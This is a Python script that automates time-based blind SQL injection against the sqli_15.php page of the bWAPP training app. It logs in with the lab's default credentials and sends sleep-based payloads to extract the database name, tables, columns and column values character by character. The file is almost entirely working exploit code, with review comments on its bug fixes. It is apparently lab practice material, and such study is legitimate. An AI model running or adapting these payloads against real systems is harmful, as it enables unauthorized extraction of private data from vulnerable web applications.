#coding:utf-8
import requests
import time
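# Target host:port and the bWAPP lab login used to obtain a session cookie.
# Everything below (sqli_15.php probes) rides on this authenticated session.
ip_port = "127.0.0.1:80"
data = {
    "login": "bee",
    "password": "bug",
    "security_level": "0",
    "form": "submit",
}
urlLogin = "http://%s/login.php" % ip_port
session = requests.session()
# A bounded timeout so an unreachable target fails fast instead of hanging
# the whole script at import time.
resp = session.post(urlLogin, data, timeout=15)
# Fail fast on 4xx/5xx. NOTE(review): a *rejected* login (wrong credentials)
# is not detectable from the status code alone; if the session is not
# authenticated the time-based oracle below simply never fires.
resp.raise_for_status()
num = 0  # unused; kept so the module namespace is unchanged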
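# Length of the current database's name, via the time-based oracle.
def get_length_of_database(max_length=64):
    """Return the length of ``database()`` on the target.

    Each probe injects ``length(database())=N and sleep(1)``; a response that
    takes longer than one second is read as "true". ``max_length`` bounds the
    search (MySQL identifiers are at most 64 characters) so a dead oracle —
    expired session, blocked payload, target down — raises instead of looping
    forever as the unbounded ``while True`` did.

    Raises:
        RuntimeError: no candidate length triggered the delay.
        requests.exceptions.RequestException: network failure or timeout.
    """
    for candidate in range(1, max_length + 1):
        url = ("http://%s/sqli_15.php?title=World War Z' and length(database())=%d"
               " and sleep(1) -- &action=search") % (ip_port, candidate)
        started = time.perf_counter()
        # Per-request timeout keeps a hung target from stalling extraction.
        session.get(url, timeout=15)
        # NOTE(review): the threshold equals the injected sleep, so a single
        # slow response on a high-latency link reads as "true"; raise both
        # together (e.g. sleep(3) / > 3) if results look corrupted.
        if time.perf_counter() - started > 1:
            return candidate
    raise RuntimeError(
        "database name length not found within %d characters; "
        "is the session still authenticated?" % max_length)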
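# Name of the current database, recovered one character per position.
def get_name_of_database():
    """Return ``database()`` on the target, recovered character by character.

    Fixes an off-by-one in the original: positions ran ``1..length-1`` and
    silently dropped the last character. Printable ASCII 33..127 is tried for
    each position; a position with no match is recorded as ``'?'`` so the
    result keeps its true length and the miss is visible (e.g. a space or a
    non-ASCII byte, which ``ascii()`` reports outside this range).
    """
    length = get_length_of_database()
    chars = []
    for position in range(1, length + 1):
        for code in range(33, 128):
            url = ("http://%s/sqli_15.php?title=World War Z' and "
                   "ascii(substr(database(),%d,1))=%d and sleep(1) -- &action=search"
                   ) % (ip_port, position, code)
            started = time.perf_counter()
            session.get(url, timeout=15)
            if time.perf_counter() - started > 1:
                chars.append(chr(code))
                break
        else:
            # No candidate fired: keep the slot rather than shortening the name.
            chars.append("?")
    return "".join(chars)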
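# Number of tables in the current database.
def get_count_of_tables(max_count=1000):
    """Return the number of tables in ``database()`` on the target.

    Candidates start at 0 so an empty schema is detected (the original started
    at 1 and would never terminate). ``max_count`` is a safety cap: if no
    candidate fires the oracle is not working and a RuntimeError is raised
    instead of looping forever.

    Raises:
        RuntimeError: no candidate count triggered the delay.
        requests.exceptions.RequestException: network failure or timeout.
    """
    for candidate in range(0, max_count + 1):
        url = ("http://%s/sqli_15.php?title=World War Z' and (select count(*) from "
               "information_schema.tables where table_schema=database())=%d"
               " and sleep(1) -- &action=search") % (ip_port, candidate)
        started = time.perf_counter()
        session.get(url, timeout=15)
        if time.perf_counter() - started > 1:
            return candidate
    raise RuntimeError(
        "table count not found within %d; is the session still authenticated?"
        % max_count)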
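# Name length of every table in the current database, in ``limit`` order.
def get_length_list_of_tables(max_length=64):
    """Return a list with the length of each table name, indexed like ``limit``.

    Entry ``i`` corresponds to ``limit i,1`` over information_schema.tables
    for the current schema. ``max_length`` (64, the MySQL identifier limit)
    bounds each search so a non-firing oracle raises instead of hanging.

    Raises:
        RuntimeError: a table's name length was not found within the cap.
        requests.exceptions.RequestException: network failure or timeout.
    """
    count_of_tables = get_count_of_tables()
    length_list = []
    for index in range(count_of_tables):
        for candidate in range(1, max_length + 1):
            url = ("http://%s/sqli_15.php?title=World War Z' and (select "
                   "length(table_name) from information_schema.tables where "
                   "table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"
                   ) % (ip_port, index, candidate)
            started = time.perf_counter()
            session.get(url, timeout=15)
            if time.perf_counter() - started > 1:
                length_list.append(candidate)
                break
        else:
            raise RuntimeError(
                "length of table #%d not found within %d" % (index, max_length))
    return length_list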
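# Names of all tables in the current database.
def get_tables():
    """Return the table names of ``database()``, recovered character by character.

    The table count is taken from the length list instead of a second
    ``get_count_of_tables()`` call, halving the probes for that step.
    Printable ASCII 33..127 is tried per position; an unmatched position is
    recorded as ``'?'`` so the name keeps its true length and the miss shows.
    """
    length_list = get_length_list_of_tables()
    name_of_tables = []
    for index, length in enumerate(length_list):
        chars = []
        for position in range(1, length + 1):
            for code in range(33, 128):
                url = ("http://%s/sqli_15.php?title=World War Z' and (select "
                       "ascii(substr((table_name),%d,1)) from information_schema.tables "
                       "where table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"
                       ) % (ip_port, position, index, code)
                started = time.perf_counter()
                session.get(url, timeout=15)
                if time.perf_counter() - started > 1:
                    chars.append(chr(code))
                    break
            else:
                chars.append("?")
        name_of_tables.append("".join(chars))
    return name_of_tables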
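# Number of columns in the given table of the current database.
def get_count_of_columns(name_of_table, max_count=1024):
    """Return the number of columns of ``name_of_table`` in ``database()``.

    ``name_of_table`` is spliced into the payload inside double quotes; it is
    expected to come from ``get_tables()`` (main() enforces that), so a name
    containing ``"`` would break the payload rather than the target. Candidates
    start at 0 and ``max_count`` caps the search so a non-firing oracle raises.

    Raises:
        RuntimeError: no candidate count triggered the delay.
        requests.exceptions.RequestException: network failure or timeout.
    """
    for candidate in range(0, max_count + 1):
        url = ("http://%s/sqli_15.php?title=World War Z' and (select count(*) from "
               "information_schema.columns where table_schema=database() and "
               "table_name=\"%s\")=%d and sleep(1) -- &action=search"
               ) % (ip_port, name_of_table, candidate)
        started = time.perf_counter()
        session.get(url, timeout=15)
        if time.perf_counter() - started > 1:
            return candidate
    raise RuntimeError(
        "column count of %s not found within %d" % (name_of_table, max_count))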
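# Name length of every column of the given table, in ``limit`` order.
def get_length_list_of_columns(name_of_table, max_length=64):
    """Return a list with the length of each column name, indexed like ``limit``.

    Entry ``i`` corresponds to ``limit i,1`` over information_schema.columns
    for ``name_of_table``. ``max_length`` (64, the MySQL identifier limit)
    bounds each search so a non-firing oracle raises instead of hanging.

    Raises:
        RuntimeError: a column's name length was not found within the cap.
        requests.exceptions.RequestException: network failure or timeout.
    """
    count_of_columns = get_count_of_columns(name_of_table)
    length_list = []
    for index in range(count_of_columns):
        for candidate in range(1, max_length + 1):
            url = ("http://%s/sqli_15.php?title=World War Z' and (select "
                   "length(column_name) from information_schema.columns where "
                   "table_schema=database() and table_name=\"%s\" limit %d,1)=%d"
                   " and sleep(1) -- &action=search"
                   ) % (ip_port, name_of_table, index, candidate)
            started = time.perf_counter()
            session.get(url, timeout=15)
            if time.perf_counter() - started > 1:
                length_list.append(candidate)
                break
        else:
            raise RuntimeError(
                "length of column #%d of %s not found within %d"
                % (index, name_of_table, max_length))
    return length_list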
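# Names of all columns of the given table.
def get_columns(name_of_table):
    """Return the column names of ``name_of_table``, recovered character by character.

    The column count is taken from the length list instead of a second
    ``get_count_of_columns()`` call. Printable ASCII 33..127 is tried per
    position; an unmatched position is recorded as ``'?'`` so the name keeps
    its true length and the miss is visible.
    """
    length_list = get_length_list_of_columns(name_of_table)
    columns = []
    for index, length in enumerate(length_list):
        chars = []
        for position in range(1, length + 1):
            for code in range(33, 128):
                url = ("http://%s/sqli_15.php?title=World War Z' and (select "
                       "ascii(substr((column_name),%d,1)) from information_schema.columns "
                       "where table_schema=database() and table_name=\"%s\" limit %d,1)=%d"
                       " and sleep(1) -- &action=search"
                       ) % (ip_port, position, name_of_table, index, code)
                started = time.perf_counter()
                session.get(url, timeout=15)
                if time.perf_counter() - started > 1:
                    chars.append(chr(code))
                    break
            else:
                chars.append("?")
        columns.append("".join(chars))
    return columns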
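# Number of rows in the given table (the value count for ``name_of_column``).
def get_count_of_datas(name_of_table, name_of_column, max_count=10000):
    """Return the number of rows of ``name_of_table`` on the target.

    Uses ``count(*)`` rather than ``count(column)``: the latter skips NULL
    values, while the callers walk rows with ``limit i,1`` which does not, so
    the two went out of step on any column containing NULLs. ``name_of_column``
    is kept for interface compatibility. Both names are spliced raw into the
    payload and are expected to come from the enumeration functions (main()
    enforces that). Candidates start at 0; ``max_count`` caps the search.

    Raises:
        RuntimeError: no candidate count triggered the delay.
        requests.exceptions.RequestException: network failure or timeout.
    """
    for candidate in range(0, max_count + 1):
        url = ("http://%s/sqli_15.php?title=World War Z' and (select count(*) from %s)=%d"
               " and sleep(1) -- &action=search") % (ip_port, name_of_table, candidate)
        started = time.perf_counter()
        session.get(url, timeout=15)
        if time.perf_counter() - started > 1:
            return candidate
    raise RuntimeError(
        "row count of %s not found within %d" % (name_of_table, max_count))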
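# Value length for every row of the given column, in ``limit`` order.
def get_length_list_of_datas(name_of_table, name_of_column, max_length=1024):
    """Return a list with the length of each value of the column, indexed like ``limit``.

    ``ifnull(length(col),0)`` and a search starting at 0 make empty strings and
    NULLs resolve to length 0; the original started at 1 with a bare
    ``length()`` and never terminated on either. ``max_length`` caps the search
    so an over-long value raises instead of hanging.

    Raises:
        RuntimeError: a value's length was not found within the cap.
        requests.exceptions.RequestException: network failure or timeout.
    """
    count_of_datas = get_count_of_datas(name_of_table, name_of_column)
    length_list = []
    for index in range(count_of_datas):
        for candidate in range(0, max_length + 1):
            url = ("http://%s/sqli_15.php?title=World War Z' and (select "
                   "ifnull(length(%s),0) from %s limit %d,1)=%d and sleep(1) -- &action=search"
                   ) % (ip_port, name_of_column, name_of_table, index, candidate)
            started = time.perf_counter()
            session.get(url, timeout=15)
            if time.perf_counter() - started > 1:
                length_list.append(candidate)
                break
        else:
            raise RuntimeError(
                "length of row #%d of %s.%s not found within %d"
                % (index, name_of_table, name_of_column, max_length))
    return length_list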
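# Brute-force every value of the given column, one character at a time.
def get_datas(name_of_table, name_of_column):
    """Return the values of ``name_of_table.name_of_column`` as strings.

    The row count is taken from the length list instead of a second
    ``get_count_of_datas()`` call. ASCII 32..127 is tried per position (the
    original started at 33 and silently dropped spaces); an unmatched
    position — typically a non-ASCII byte — is recorded as ``'?'`` so the
    value keeps its true length. NULL / empty values come out as ``""``.

    NOTE(review): rows are addressed with ``limit i,1`` and no ORDER BY, so
    MySQL does not guarantee a stable order between probes; add an ORDER BY
    on a key column if rows appear interleaved.
    """
    length_list = get_length_list_of_datas(name_of_table, name_of_column)
    datas = []
    for index, length in enumerate(length_list):
        chars = []
        for position in range(1, length + 1):
            for code in range(32, 128):
                url = ("http://%s/sqli_15.php?title=World War Z' and (select "
                       "ascii(substr((%s),%d,1)) from %s limit %d,1)=%d and sleep(1) -- &action=search"
                       ) % (ip_port, name_of_column, position, name_of_table, index, code)
                started = time.perf_counter()
                session.get(url, timeout=15)
                if time.perf_counter() - started > 1:
                    chars.append(chr(code))
                    break
            else:
                chars.append("?")
        datas.append("".join(chars))
    return datas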
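def main():
    """Interactive driver: database name, tables, columns of one table, one column's values.

    The table and column names typed by the user are accepted only if they
    were just enumerated from the target; that is the sole guard before they
    are spliced raw into later SQL payloads, so keep it. Exits with status 1
    on a bad selection (the original ``exit()`` returned 0).
    """
    print("Judging the database...")
    # The original printed this banner but never reported the name.
    print("[+]%s" % get_name_of_database())
    print()
    print("Getting the table name...")
    tables = get_tables()
    for name in tables:
        print("[+]%s" % name)
    print("The table names in this database are:%s" % tables)
    table = input("Select the Table name:")
    if table not in tables:
        print("Error!")
        raise SystemExit(1)
    print()
    print("Getting the column names in the %s table......" % table)
    columns = get_columns(table)
    for name in columns:
        print("[+]%s" % name)
    print("The column name in %s are:%s" % (table, columns))
    column = input("Select the Column name:")
    if column not in columns:
        print("Error!")
        raise SystemExit(1)
    print()
    print("Getting the datas......")
    for value in get_datas(table, column):
        print("[+]%s" % value)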
# Run the interactive driver only when executed as a script. Note that the
# login POST near the top of the file still runs on plain import.
if __name__=='__main__':
    main()